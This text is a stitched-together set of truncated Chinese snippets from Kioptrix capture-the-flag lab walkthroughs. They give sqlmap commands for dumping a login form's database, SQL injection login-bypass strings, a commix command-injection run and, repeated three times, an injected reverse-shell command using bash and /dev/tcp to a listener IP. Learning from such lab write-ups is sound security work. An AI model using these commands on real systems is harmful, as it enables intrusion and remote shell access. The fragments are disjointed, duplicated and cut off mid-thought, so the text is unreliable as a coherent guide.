我真是傻了,能用sql语句进入,说明后台有数据库有sql注入嘛,直接用sqlmap啊 en…… 但是好像没有注入点id=x,sql不精通啊,算了 探测五:https://192.168.1.117 显示“192.168.1.117 的网站管理员未正确配置网站。为避免您的信息被窃,Firefox 没有与该网站建立连接。” ...
尝试用sqlmap跑了下,最后得到了账号密码。 命令:sqlmap -u "http://192.168.1.9/index.php" --data "uname=1&psw=1&btnLogin=Login" --dbs --batch --level 4 --risk 3 得到数据库:webapp 命令:sqlmap -u "http://192.168.1.9/index.php" --data "uname=1&psw=1&btnLogin=Login" --dbs --le...
使用单引号测试SQL注入发现页面没有任何变化,尝试使用用户名‘=’和密码‘=’登录成功,如图: 可见这里存在SQL注入,使用sqlmap测试时,在level=3,risk=2的条件下发现uname参数存在SQL注入漏洞,如图: 但是权限较低,无法通过SQL注入获取root用户密码和shell。 命令注入漏洞 在登录后的页面测试是否存在命令注入漏洞,使用127...
sql 先简单手动尝试几下,发现直接就是成功进入系统asd' or 1 -- #。如果手动检测不到,也可以直接 sqlmap 进入成功后发现是具有 ping 功能,应该猜想到可能有 命令注入。 尝试常见的闭合方式,没总结,就直接上工具 coomix 将请求用 burp 捕捉并保存到文件 zzz,然后直接python2 commix.py -r zzz -p ip 原来直...
靶机地址:Kioptrix: Level 1.1 (#2)环境设置:两台虚拟机,一台Kali,一台靶机,用VirtualBox配置,两台虚拟机网络都设置成Host-only模式,选用同一个虚拟网卡进行通信。 渗透过程:探测主机:使用命令探测同一个…
通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集...
sqlmap跑了一下,有注入,不过后面有命令执行,就忽略 看到这样的套路,就知道有命令执行漏洞内核版本使用nc监听1234端口,然后在PHP执行下面命令 ;bash -i >& /dev/tcp/192.168.199.176/1234 0>&1提权 提权成功 Kioptrix_Level_1.2 找到靶机的IP是192.168.199.218 ...
sqlmap跑了一下,有注入,不过后面有命令执行,就忽略 看到这样的套路,就知道有命令执行漏洞 内核版本 使用nc监听1234端口,然后在PHP执行下面命令 ;bash -i >& /dev/tcp/192.168.199.176/1234 0>&1 提权 提权成功 Kioptrix_Level_1.2 找到靶机的IP是192.168.199.218 ...
Kioptrix_Level_1 主机发现 用netdiscover工具进行内网主机发现。 Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。 1. 我使用以下命令: netdiscover -i eth0 1. 命令解释 -i:网卡,选择你监控的网卡。比如eth0。 1. 如图: 工具执行后内容: ...
sqlmap跑了一下,有注入,不过后面有命令执行,就忽略 看到这样的套路,就知道有命令执行漏洞 内核版本 使用nc监听1234端口,然后在PHP执行下面命令 ;bash -i >& /dev/tcp/192.168.199.176/1234 0>&1 提权 提权成功 Kioptrix_Level_1.2 找到靶机的IP是192.168.199.218 ...